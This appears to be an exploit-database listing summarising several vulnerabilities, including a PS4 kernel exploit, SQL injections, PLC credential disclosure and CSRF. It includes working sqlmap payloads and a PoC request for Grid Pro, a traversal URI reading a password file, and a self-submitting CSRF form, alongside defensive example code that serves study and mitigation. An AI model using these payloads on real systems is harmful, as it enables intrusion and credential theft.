Explore Vulnerabilities

Explore all Exploits:

PS4 5.05 Kernel Exploit

This project contains a full implementation of the second 'bpf' kernel exploit for the PlayStation 4 on firmware 5.05. It allows arbitrary code execution in the kernel, which enables jailbreaking and kernel-level modifications of the system. The exploit also contains auto-launching code for Mira and Vortex's HEN payload. The bug was discovered by qwertyoruiopz. The kernel patches included are:

- Disable kernel write protection
- Allow RWX (read-write-execute) memory mapping
- Syscall instruction allowed anywhere
- Dynamic resolving (`sys_dynlib_dlsym`) allowed from any process
- Custom system call #11 (`kexec()`) to execute arbitrary code in kernel mode
- Allow unprivileged users to call `setuid(0)` successfully

ChakraCore Type Confusion Vulnerability

The ChakraCore JavaScript engine is vulnerable to type confusion because no ImplicitCallFlags check is performed after the call to the EntrySimpleObjectSlotGetter method. The method wraps its return value using CrossSite::MarshalVar, which walks up the prototype chain of the given object via GetPrototype. If a Proxy object on that chain supplies a getPrototypeOf handler, the handler runs arbitrary JavaScript in the middle of the walk and can change the object's type or layout underneath the caller, which then continues on stale assumptions: a type confusion.

Grid Pro Big Data 1.0 – ‘test.php’ SQL Injection

Multiple parameters of the 'test.php' query are vulnerable to SQL injection. The request below is the proof of concept; the findings that follow it are given in sqlmap's output format.

PoC request:

POST /release/pro_grid_big_data/php/test.php HTTP/1.1
Host: site.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://site.com/release/pro_grid_big_data/index.html
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 430
Connection: keep-alive

page=1&on_home=5&table_name=be&params%5B0%5D%5Btype%5D=text&params%5B0%5D%5Bvalue%5D=&params%5B0%5D%5Bname%5D=Name&params%5B1%5D%5Btype%5D=text&params%5B1%5D%5Bvalue%5D=&params%5B1%5D%5Bname%5D=Surname&params%5B2%5D%5Btype%5D=num_range&params%5B2%5D%5Bvalue%5D%5B%5D=&params%5B2%5D%5Bvalue%5D%5B%5D=&params%5B2%5D%5Bname%5D=Age&params%5B3%5D%5Btype%5D=date&params%5B3%5D%5Bvalue%5D=&params%5B3%5D%5Bname%5D=Born_date&ordering=none

Findings:

Parameter: on_home (POST)
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: page=2&on_home=5 UNION ALL SELECT CONCAT(CONCAT('qjbqq','vVWAgYsZnIsAkqERYDgZibFieBTaDlfAymtKvnaO'),'qxbpq'),NULL,NULL,NULL-- LEgG&table_name=be&params[0][type]=text&params[0][value]=&params[0][name]=Name&params[1][type]=text&params[1][value]=&params[1][name]=Surname&params[2][type]=num_range&params[2][value][]=&params[2][value][]=&params[2][name]=Age&params[3][type]=date&params[3][value]=&params[3][name]=Born_date&ordering=none

Parameter: params[0][value] (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: page=2&on_home=5 AND 5862=5862&table_name=be&params[0][type]=text&params[0][value]=&params[0][name]=Name&params[1][type]=text&params[1][value]=&params[1][name]=Surname&params[2][type]=num_range&params[2][value][]=&params[2][value][]=&params[2][name]=Age&params[3][type]=date&params[3][value]=&params[3][name]=Born_date&ordering=none

CSV Import & Export v1.1.0 – SQL Injection / Cross-Site Scripting

The 'offset' and 'db' parameters of the database table preview query are vulnerable. An attacker can exploit this by sending a malicious payload in either parameter; the payload can be a UNION query (SQL injection) or a Cross-Site Scripting payload.

TAC Xenta 511 and 911 Credentials Disclosure

Directory traversal in the help manuals of Schneider Electric TAC Xenta 911 and 511 PLCs allows credentials to be extracted. The devices are not indexed by crawlers such as Shodan or Censys because of their ancient SSL configuration; an old browser was needed to connect at all (not even s_client, curl or ncat could negotiate a connection). Example URI: /www/help/public/../../../sys/pswd
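The example URI above reaches /sys/pswd because each `..` segment steps out of the help directory. The following is an added example (not code from the advisory or the device firmware) that resolves a request path the way a naive file handler would and flags the ones that escape the intended root; the web root, the percent-encoded variant and the helper names are assumptions made for the example.

```python
import posixpath
from urllib.parse import unquote

# Constructed values for this example, not taken from the device.
WEB_ROOT = "/www/help/public"                       # directory the help handler is meant to serve
EXAMPLE_URI = "/www/help/public/../../../sys/pswd"  # the URI quoted in the advisory above


def resolve_uri(uri):
    """Return the absolute path a naive file handler would open for `uri`.

    Percent-decoding first matters: '%2e%2e' is '..' to the file system but
    not to a string comparison against '..'. normpath then collapses the
    '.' and '..' segments lexically (no disk access).
    """
    return posixpath.normpath(unquote(uri))


def escapes_root(uri, root=WEB_ROOT):
    """True when the resolved path lies outside `root`.

    The trailing '/' in the prefix test stops '/www/help/publicX' from
    passing as a child of '/www/help/public'.
    """
    resolved = resolve_uri(uri)
    root = posixpath.normpath(root)
    return not (resolved == root or resolved.startswith(root + "/"))


def classify(uri):
    """Label a request and show where it would really land on disk."""
    return ("TRAVERSAL" if escapes_root(uri) else "OK", resolve_uri(uri))


if __name__ == "__main__":
    for uri in (EXAMPLE_URI,
                "/www/help/public/index.html",
                "/www/help/public/%2e%2e/%2e%2e/%2e%2e/sys/pswd"):
        print(uri, "->", classify(uri))
```

The same containment test is what a fixed handler would run before opening the file; since the device firmware itself cannot be changed by the operator, the check is mostly useful for triaging web-server logs from these PLCs.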

Qualys Security Advisory – Procps-ng Audit Report

Findings from the audit:

- An attacker can block any read() access to /proc/PID/cmdline by mmap()ing a FUSE (Filesystem in Userspace) file onto that process's command-line arguments.
- An attacker can hide a process from the ps and w utilities by changing the process's name to a string that contains a non-printable character.
- An attacker can cause top to crash by sending it a SIGWINCH signal while it is in the middle of a read() call.
- An attacker can cause ps to crash by sending it a SIGWINCH signal while it is in the middle of a read() call.
- An attacker can cause a stack-based buffer overflow in libprocps by presenting a specially crafted /proc/PID/stat file to the ps utility.
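Two of the findings above come down to the process name (the comm field) being attacker-controlled: it may contain spaces, parentheses and control bytes. The following is an added example, not code from procps-ng or the Qualys report, that parses /proc/PID/stat anchored on the last ')' rather than by splitting on spaces, and renders the name so that control bytes cannot hide a row on a terminal. The stat lines are constructed for the example.

```python
# Constructed /proc/PID/stat lines. The comm field in parentheses is set by
# the process itself (prctl(PR_SET_NAME) or the executable name) and may
# contain spaces, ')' and non-printable bytes.
SAMPLE_STAT_LINES = [
    b"1234 (bash) S 1 1234 1234 34816 1234 4194560 0 0 0 0 0 0 0 0 20 0 1 0 100 0 0",
    b"4321 (a) b) R 1 4321 4321 0 -1 4194560 0 0 0 0 0 0 0 0 20 0 1 0 200 0 0",
    b"5555 (sshd\x1b[2K) S 1 5555 5555 0 -1 4194560 0 0 0 0 0 0 0 0 20 0 1 0 300 0 0",
]


def parse_stat(line):
    """Parse pid, comm, state and ppid from one /proc/PID/stat line.

    Every field after comm is a number or a single letter and can never
    contain ')', so the LAST ')' is the only safe end-of-comm marker.
    """
    open_paren = line.index(b"(")
    close_paren = line.rindex(b")")
    pid = int(line[:open_paren].strip())
    comm = line[open_paren + 1:close_paren]
    rest = line[close_paren + 1:].split()
    if len(rest) < 2:
        raise ValueError("truncated stat line")
    return {"pid": pid, "comm": comm,
            "state": rest[0].decode("ascii"), "ppid": int(rest[1])}


def naive_parse_stat(line):
    """The fragile split-on-whitespace approach, kept to show the failure."""
    fields = line.split()
    return {"pid": int(fields[0]), "comm": fields[1].strip(b"()"),
            "state": fields[2].decode("ascii"), "ppid": int(fields[3])}


def naive_fails(line):
    """True when the naive parser chokes on a crafted comm field."""
    try:
        naive_parse_stat(line)
    except (ValueError, UnicodeDecodeError):
        return True
    return False


def sanitize_comm(comm):
    """Render a process name so control bytes are shown as \\xNN escapes
    instead of being sent to the terminal, where they could clear the line."""
    return "".join(chr(b) if 0x20 <= b < 0x7F else "\\x%02x" % b for b in comm)


def process_table(lines):
    """(pid, ppid, state, display name) for each stat line."""
    return [(p["pid"], p["ppid"], p["state"], sanitize_comm(p["comm"]))
            for p in map(parse_stat, lines)]


if __name__ == "__main__":
    for row in process_table(SAMPLE_STAT_LINES):
        print(row)
```

The second sample line breaks the naive parser (its fourth field is `R`, not a number), while the third would clear the terminal line if printed raw; the escaped rendering keeps the entry visible.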

[CVE-2018-10094] Dolibarr SQL Injection vulnerability

Dolibarr is an 'Open Source ERP & CRM for Business' used by many companies worldwide. It is available through GitHub or as distribution packages (e.g. a .deb package). The application does not handle user input properly and allows execution of arbitrary SQL commands on the database. Prepared queries should be used for user-supplied values in order to avoid SQL injection.
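The Grid Pro Big Data, CSV Import & Export and Dolibarr entries above all describe the same root cause: a request parameter concatenated into a query. The following is an added example, not code from any of those projects, that runs the two sqlmap techniques shown in the Grid Pro output (a 4-column UNION with boundary markers, and boolean-based blind) against a throwaway SQLite database, then shows the prepared-query form the Dolibarr entry recommends. The tables, the hash value and the `on_home` filter are constructed; the real targets run MySQL, where the page's payload uses CONCAT(), so the payload here uses SQLite's `||` for the same effect.

```python
import re
import sqlite3

MARK_L, MARK_R = "qjbqq", "qxbpq"   # boundary markers as in the sqlmap output above


def make_db():
    """Constructed data set standing in for the application's database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE be (name TEXT, surname TEXT, age INTEGER, born_date TEXT);
        INSERT INTO be VALUES ('Ann', 'Lee', 30, '1990-01-01'),
                              ('Bob', 'Kim', 41, '1980-05-05');
        CREATE TABLE users (login TEXT, pw_hash TEXT);
        INSERT INTO users VALUES ('admin', '5f4dcc3b5aa765d89d3f6c4bc2c0b7d1');
    """)
    return conn


def vulnerable_query(conn, on_home):
    """Hypothetical grid back end: the request parameter is pasted into SQL."""
    sql = f"SELECT name, surname, age, born_date FROM be WHERE age > {on_home}"
    return conn.execute(sql).fetchall()


def safe_query(conn, on_home):
    """Same query with the value bound as a parameter and typed as an integer."""
    return conn.execute(
        "SELECT name, surname, age, born_date FROM be WHERE age > ?",
        (int(on_home),),
    ).fetchall()


# Four columns so the UNION lines up with the 4-column SELECT; the markers
# let the attacker find the injected value anywhere in the rendered page.
UNION_PAYLOAD = ("5 UNION ALL SELECT '" + MARK_L + "'||pw_hash||'" + MARK_R
                 + "',NULL,NULL,NULL FROM users-- ")
TRUE_PAYLOAD = "5 AND 5862=5862"    # boolean-based blind: same rows as '5'
FALSE_PAYLOAD = "5 AND 5862=5863"   # ... and no rows at all


def extract_marked(rows):
    """Pull values between the markers out of a result set, as sqlmap does."""
    pattern = re.compile(re.escape(MARK_L) + "(.*?)" + re.escape(MARK_R))
    return [m.group(1) for row in rows for cell in row
            if isinstance(cell, str) for m in pattern.finditer(cell)]


def is_rejected(query_fn, conn, payload):
    """True when the query function refuses the payload instead of running it."""
    try:
        query_fn(conn, payload)
    except (ValueError, sqlite3.Error):
        return True
    return False


if __name__ == "__main__":
    conn = make_db()
    print("leaked:", extract_marked(vulnerable_query(conn, UNION_PAYLOAD)))
    print("blind true/false rows:", len(vulnerable_query(conn, TRUE_PAYLOAD)),
          len(vulnerable_query(conn, FALSE_PAYLOAD)))
    print("prepared query rejects payload:", is_rejected(safe_query, conn, UNION_PAYLOAD))
```

The blind technique needs no leaked column at all: the attacker only compares the row count (or page length) for the true and false conditions, which is why it still works when UNION output is not rendered.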

MachForm SQL Injection and Path Traversal

The form creation platform MachForm from Appnitro is subject to SQL injections that lead to path traversal and arbitrary file upload. The application is widely deployed, and with some Google dorks it is possible to find various web pages storing sensitive data such as credit card numbers with their corresponding security codes. The arbitrary file upload also lets an attacker gain control of the server by uploading a web shell.

Yosoro 1.0.4 – Remote Code Execution

A vulnerability in Yosoro 1.0.4 allows an attacker to execute arbitrary code on the target system. It exists because the webview component performs insufficient input validation. An attacker exploits it by delivering a specially crafted payload to the webview component; the payload carries malicious JavaScript that reads the /etc/passwd file and sends it to a remote server, and the attacker can then use that information to gain access to the target system.

Schneider Electric PLCs – Cross-Site Request Forgery

Schneider Electric PLCs are vulnerable to Cross-Site Request Forgery (CSRF). An attacker crafts a malicious HTML page containing a form with pre-filled values that targets the PLC's web interface. When a user who is logged in to the PLC visits the page, the form is submitted automatically with that user's browser session, and the user's credentials are changed without their knowledge. This can be used to gain access to the PLCs.
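What the forged request looks like from the server's side, and the three checks that defeat it, as an added example that is not Schneider Electric code: the session store, device origin, cookie name and form field names are assumptions made for the example, and both requests are constructed.

```python
import hmac
from urllib.parse import parse_qs, urlsplit

# Constructed session store: one logged-in admin with a per-session token.
SESSIONS = {"sid-123": {"user": "admin", "csrf_token": "t0k3n-abc"}}
DEVICE_ORIGIN = "https://plc.example.internal"   # assumed origin of the PLC web UI

# The attacker's page as described above: a pre-filled form that submits
# itself. The browser attaches the victim's PLC session cookie automatically.
ATTACK_PAGE = (
    '<form id="f" method="POST" action="https://plc.example.internal/setpw">'
    '<input name="user" value="admin"><input name="password" value="pwned"></form>'
    '<script>document.getElementById("f").submit()</script>'
)

# What the PLC receives from that page (headers, body) vs. from the real UI.
FORGED_REQUEST = ({"Cookie": "sid=sid-123", "Origin": "https://attacker.example"},
                  "user=admin&password=pwned")
LEGIT_REQUEST = ({"Cookie": "sid=sid-123", "Origin": DEVICE_ORIGIN},
                 "user=admin&password=newpass&csrf_token=t0k3n-abc")


def _session_from_cookie(cookie_header, sessions):
    for part in cookie_header.split(";"):
        name, _, value = part.strip().partition("=")
        if name == "sid":
            return sessions.get(value)
    return None


def _origin_of(headers):
    """Origin header if present, else derived from Referer, else None."""
    if "Origin" in headers:
        return headers["Origin"]
    if "Referer" in headers:
        u = urlsplit(headers["Referer"])
        return f"{u.scheme}://{u.netloc}"
    return None


def is_state_change_allowed(headers, body, sessions=SESSIONS):
    """Server-side decision for a credential-change POST.

    Requires a valid session, a same-origin Origin/Referer, and a token that
    only a page served by the device could know. Missing origin fails closed.
    """
    session = _session_from_cookie(headers.get("Cookie", ""), sessions)
    if session is None:
        return False
    if _origin_of(headers) != DEVICE_ORIGIN:
        return False
    submitted = parse_qs(body).get("csrf_token", [""])[0]
    return hmac.compare_digest(submitted, session["csrf_token"])


if __name__ == "__main__":
    print("forged allowed:", is_state_change_allowed(*FORGED_REQUEST))
    print("legit allowed:", is_state_change_allowed(*LEGIT_REQUEST))
```

The cookie alone cannot distinguish the two requests, which is the whole point of CSRF; the origin check and the token are what tie the request to a page the device itself served. Where the PLC firmware cannot be changed, the practical mitigation is keeping the web interface off any network a browsing workstation can reach.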
